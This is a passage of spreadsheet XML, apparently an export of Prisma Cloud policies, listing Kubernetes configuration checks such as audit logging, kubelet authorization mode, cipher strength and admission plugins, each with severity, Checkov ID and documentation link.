          <t>build</t>
        </is>
      </c>
      <c r="Q1155" t="inlineStr"/>
      <c r="R1155" t="inlineStr"/>
      <c r="S1155" t="inlineStr"/>
      <c r="T1155" t="b">
        <v>0</v>
      </c>
      <c r="U1155" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1155" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1155" t="inlineStr">
        <is>
          <t>Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate</t>
        </is>
      </c>
      <c r="X1155" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate</t>
        </is>
      </c>
      <c r="Y1155" t="inlineStr"/>
      <c r="Z1155" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1155" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1155" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1155" t="inlineStr">
        <is>
          <t>CKV_K8S_94</t>
        </is>
      </c>
      <c r="AD1155" t="b">
        <v>1</v>
      </c>
      <c r="AE1155" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1155" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>6767c20f-d201-4c6c-8294-53d294fd39f0</t>
        </is>
      </c>
      <c r="AI1155" t="inlineStr"/>
      <c r="AJ1155" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1155" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" t="inlineStr"/>
      <c r="B1156" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1156" s="2" t="inlineStr"/>
      <c r="D1156" t="inlineStr"/>
      <c r="E1156" t="inlineStr"/>
      <c r="F1156" t="inlineStr"/>
      <c r="G1156" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1156" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1156" t="inlineStr">
        <is>
          <t>The --authorization-mode argument is set to AlwaysAllow for Kubelet</t>
        </is>
      </c>
      <c r="L1156" t="inlineStr"/>
      <c r="M1156" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1156" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1156" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1156" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1156" t="inlineStr"/>
      <c r="R1156" t="inlineStr"/>
      <c r="S1156" t="inlineStr"/>
      <c r="T1156" t="b">
        <v>0</v>
      </c>
      <c r="U1156" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1156" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1156" t="inlineStr">
        <is>
          <t>Ensure that the --authorization-mode argument is not set to AlwaysAllow</t>
        </is>
      </c>
      <c r="X1156" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1</t>
        </is>
      </c>
      <c r="Y1156" t="inlineStr"/>
      <c r="Z1156" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1156" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1156" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1156" t="inlineStr">
        <is>
          <t>CKV_K8S_74</t>
        </is>
      </c>
      <c r="AD1156" t="b">
        <v>1</v>
      </c>
      <c r="AE1156" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1156" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>b7c20b54-5888-4f2a-8b25-7c918f6beb78</t>
        </is>
      </c>
      <c r="AI1156" t="inlineStr"/>
      <c r="AJ1156" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1156" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" t="inlineStr"/>
      <c r="B1157" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1157" s="2" t="inlineStr"/>
      <c r="D1157" t="inlineStr"/>
      <c r="E1157" t="inlineStr"/>
      <c r="F1157" t="inlineStr"/>
      <c r="G1157" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1157" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1157" t="inlineStr">
        <is>
          <t>The --streaming-connection-idle-timeout argument is set to 0</t>
        </is>
      </c>
      <c r="L1157" t="inlineStr"/>
      <c r="M1157" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1157" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1157" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1157" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1157" t="inlineStr"/>
      <c r="R1157" t="inlineStr"/>
      <c r="S1157" t="inlineStr"/>
      <c r="T1157" t="b">
        <v>0</v>
      </c>
      <c r="U1157" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1157" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1157" t="inlineStr">
        <is>
          <t>Ensure that the --streaming-connection-idle-timeout argument is not set to 0</t>
        </is>
      </c>
      <c r="X1157" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0</t>
        </is>
      </c>
      <c r="Y1157" t="inlineStr"/>
      <c r="Z1157" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1157" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1157" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1157" t="inlineStr">
        <is>
          <t>CKV_K8S_143</t>
        </is>
      </c>
      <c r="AD1157" t="b">
        <v>1</v>
      </c>
      <c r="AE1157" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1157" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>87d48757-cb0e-4662-b1a4-063eb0ecc807</t>
        </is>
      </c>
      <c r="AI1157" t="inlineStr"/>
      <c r="AJ1157" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1157" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" t="inlineStr"/>
      <c r="B1158" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1158" s="2" t="inlineStr"/>
      <c r="D1158" t="inlineStr"/>
      <c r="E1158" t="inlineStr"/>
      <c r="F1158" t="inlineStr"/>
      <c r="G1158" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1158" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1158" t="inlineStr">
        <is>
          <t>The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used</t>
        </is>
      </c>
      <c r="L1158" t="inlineStr"/>
      <c r="M1158" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1158" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1158" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1158" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1158" t="inlineStr"/>
      <c r="R1158" t="inlineStr"/>
      <c r="S1158" t="inlineStr"/>
      <c r="T1158" t="b">
        <v>0</v>
      </c>
      <c r="U1158" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1158" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1158" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used</t>
        </is>
      </c>
      <c r="X1158" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used</t>
        </is>
      </c>
      <c r="Y1158" t="inlineStr"/>
      <c r="Z1158" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1158" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1158" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1158" t="inlineStr">
        <is>
          <t>CKV_K8S_81</t>
        </is>
      </c>
      <c r="AD1158" t="b">
        <v>1</v>
      </c>
      <c r="AE1158" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1158" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>77990153-befb-46dd-9671-5d6bdb08a79d</t>
        </is>
      </c>
      <c r="AI1158" t="inlineStr"/>
      <c r="AJ1158" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1158" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" t="inlineStr"/>
      <c r="B1159" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1159" s="2" t="inlineStr"/>
      <c r="D1159" t="inlineStr"/>
      <c r="E1159" t="inlineStr"/>
      <c r="F1159" t="inlineStr"/>
      <c r="G1159" t="b">
        <v>1</v>
      </c>
      <c r="H11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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1159" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1159" t="inlineStr">
        <is>
          <t>Readiness probe is not configured</t>
        </is>
      </c>
      <c r="L1159" t="inlineStr"/>
      <c r="M1159" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1159" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1159" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1159" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1159" t="inlineStr"/>
      <c r="R1159" t="inlineStr"/>
      <c r="S1159" t="inlineStr"/>
      <c r="T1159" t="b">
        <v>0</v>
      </c>
      <c r="U1159" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1159" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1159" t="inlineStr">
        <is>
          <t>Readiness Probe Should be Configured</t>
        </is>
      </c>
      <c r="X1159" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8</t>
        </is>
      </c>
      <c r="Y1159" t="inlineStr"/>
      <c r="Z1159" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1159" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1159" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1159" t="inlineStr">
        <is>
          <t>CKV_K8S_9</t>
        </is>
      </c>
      <c r="AD1159" t="b">
        <v>1</v>
      </c>
      <c r="AE1159" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1159" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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59" t="inlineStr">
        <is>
          <t>b5b36b9a-68f5-4825-9d1b-bcd3dcea2141</t>
        </is>
      </c>
      <c r="AI1159" t="inlineStr"/>
      <c r="AJ1159" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1159" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" t="inlineStr"/>
      <c r="B1160" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1160" s="2" t="inlineStr"/>
      <c r="D1160" t="inlineStr"/>
      <c r="E1160" t="inlineStr"/>
      <c r="F1160" t="inlineStr"/>
      <c r="G1160" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1160" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1160" t="inlineStr">
        <is>
          <t>The --audit-log-path argument is not set</t>
        </is>
      </c>
      <c r="L1160" t="inlineStr"/>
      <c r="M1160" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1160" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1160" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1160" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1160" t="inlineStr"/>
      <c r="R1160" t="inlineStr"/>
      <c r="S1160" t="inlineStr"/>
      <c r="T1160" t="b">
        <v>0</v>
      </c>
      <c r="U1160" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1160" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1160" t="inlineStr">
        <is>
          <t>Ensure that the --audit-log-path argument is set</t>
        </is>
      </c>
      <c r="X1160" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set</t>
        </is>
      </c>
      <c r="Y1160" t="inlineStr"/>
      <c r="Z1160" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1160" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1160" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1160" t="inlineStr">
        <is>
          <t>CKV_K8S_91</t>
        </is>
      </c>
      <c r="AD1160" t="b">
        <v>1</v>
      </c>
      <c r="AE1160" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1160" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>3814f782-44fb-47fc-82b2-390669d518a1</t>
        </is>
      </c>
      <c r="AI1160" t="inlineStr"/>
      <c r="AJ1160" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1160" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" t="inlineStr"/>
      <c r="B1161" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1161" s="2" t="inlineStr"/>
      <c r="D1161" t="inlineStr"/>
      <c r="E1161" t="inlineStr"/>
      <c r="F1161" t="inlineStr"/>
      <c r="G1161" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1161" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1161" t="inlineStr">
        <is>
          <t>The --etcd-cafile argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1161" t="inlineStr"/>
      <c r="M1161" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1161" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1161" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1161" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1161" t="inlineStr"/>
      <c r="R1161" t="inlineStr"/>
      <c r="S1161" t="inlineStr"/>
      <c r="T1161" t="b">
        <v>0</v>
      </c>
      <c r="U1161" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1161" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1161" t="inlineStr">
        <is>
          <t>Ensure that the --etcd-ca-file argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1161" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1</t>
        </is>
      </c>
      <c r="Y1161" t="inlineStr"/>
      <c r="Z1161" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1161" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1161" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1161" t="inlineStr">
        <is>
          <t>CKV_K8S_102</t>
        </is>
      </c>
      <c r="AD1161" t="b">
        <v>1</v>
      </c>
      <c r="AE1161" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1161" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>48ec1bd2-6f41-4289-8d51-7d7937633644</t>
        </is>
      </c>
      <c r="AI1161" t="inlineStr"/>
      <c r="AJ1161" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1161" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" t="inlineStr"/>
      <c r="B1162" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1162" s="2" t="inlineStr"/>
      <c r="D1162" t="inlineStr"/>
      <c r="E1162" t="inlineStr"/>
      <c r="F1162" t="inlineStr"/>
      <c r="G1162" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1162" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1162" t="inlineStr">
        <is>
          <t>Kubelet does not use strong cryptographic ciphers</t>
        </is>
      </c>
      <c r="L1162" t="inlineStr"/>
      <c r="M1162" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1162" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1162" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1162" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1162" t="inlineStr"/>
      <c r="R1162" t="inlineStr"/>
      <c r="S1162" t="inlineStr"/>
      <c r="T1162" t="b">
        <v>0</v>
      </c>
      <c r="U1162" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1162" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1162" t="inlineStr">
        <is>
          <t>Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers</t>
        </is>
      </c>
      <c r="X1162" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers</t>
        </is>
      </c>
      <c r="Y1162" t="inlineStr"/>
      <c r="Z1162" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1162" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1162" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1162" t="inlineStr">
        <is>
          <t>CKV_K8S_151</t>
        </is>
      </c>
      <c r="AD1162" t="b">
        <v>1</v>
      </c>
      <c r="AE1162" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1162" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>3e781500-a383-4f1f-afe9-a5a72b13e1aa</t>
        </is>
      </c>
      <c r="AI1162" t="inlineStr"/>
      <c r="AJ1162" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1162" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" t="inlineStr"/>
      <c r="B1163" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1163" s="2" t="inlineStr"/>
      <c r="D1163" t="inlineStr"/>
      <c r="E1163" t="inlineStr"/>
      <c r="F1163" t="inlineStr"/>
      <c r="G1163" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1163" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1163" t="inlineStr">
        <is>
          <t>The admission control plugin NodeRestriction is not set</t>
        </is>
      </c>
      <c r="L1163" t="inlineStr"/>
      <c r="M1163" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1163" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1163" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1163" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1163" t="inlineStr"/>
      <c r="R1163" t="inlineStr"/>
      <c r="S1163" t="inlineStr"/>
      <c r="T1163" t="b">
        <v>0</v>
      </c>
      <c r="U1163" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1163" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1163" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin NodeRestriction is set</t>
        </is>
      </c>
      <c r="X1163" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set</t>
        </is>
      </c>
      <c r="Y1163" t="inlineStr"/>
      <c r="Z1163" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1163" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1163" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1163" t="inlineStr">
        <is>
          <t>CKV_K8S_85</t>
        </is>
      </c>
      <c r="AD1163" t="b">
        <v>1</v>
      </c>
      <c r="AE1163" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1163" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>6286b8bb-b744-4700-898e-a953cb7ffd0c</t>
        </is>
      </c>
      <c r="AI1163" t="inlineStr"/>
      <c r="AJ1163" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1163" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" t="inlineStr"/>
      <c r="B1164" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1164" s="2" t="inlineStr"/>
      <c r="D1164" t="inlineStr"/>
      <c r="E1164" t="inlineStr"/>
      <c r="F1164" t="inlineStr"/>
      <c r="G1164" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1164" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1164" t="inlineStr">
        <is>
          <t>The admission control plugin PodSecurityPolicy is not set</t>
        </is>
      </c>
      <c r="L1164" t="inlineStr"/>
      <c r="M1164" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1164" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1164" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1164" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1164" t="inlineStr"/>
      <c r="R1164" t="inlineStr"/>
      <c r="S1164" t="inlineStr"/>
      <c r="T1164" t="b">
        <v>0</v>
      </c>
      <c r="U1164" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1164" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1164" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin PodSecurityPolicy is set</t>
        </is>
      </c>
      <c r="X1164" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set</t>
        </is>
      </c>
      <c r="Y1164" t="inlineStr"/>
      <c r="Z1164" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1164" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1164" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1164" t="inlineStr">
        <is>
          <t>CKV_K8S_84</t>
        </is>
      </c>
      <c r="AD1164" t="b">
        <v>1</v>
      </c>
      <c r="AE1164" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1164" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>2401aa65-cc25-42f5-b5cf-dd9afa96174e</t>
        </is>
      </c>
      <c r="AI1164" t="inlineStr"/>
      <c r="AJ1164" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1164" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" t="inlineStr"/>
      <c r="B1165" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1165" s="2" t="inlineStr"/>
      <c r="D1165" t="inlineStr"/>
      <c r="E1165" t="inlineStr"/>
      <c r="F1165" t="inlineStr"/>
      <c r="G1165" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1165" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1165" t="inlineStr">
        <is>
          <t>The admission control plugin AlwaysAdmit is set</t>
        </is>
      </c>
      <c r="L1165" t="inlineStr"/>
      <c r="M1165" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1165" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1165" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1165" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1165" t="inlineStr"/>
      <c r="R1165" t="inlineStr"/>
      <c r="S1165" t="inlineStr"/>
      <c r="T1165" t="b">
        <v>0</v>
      </c>
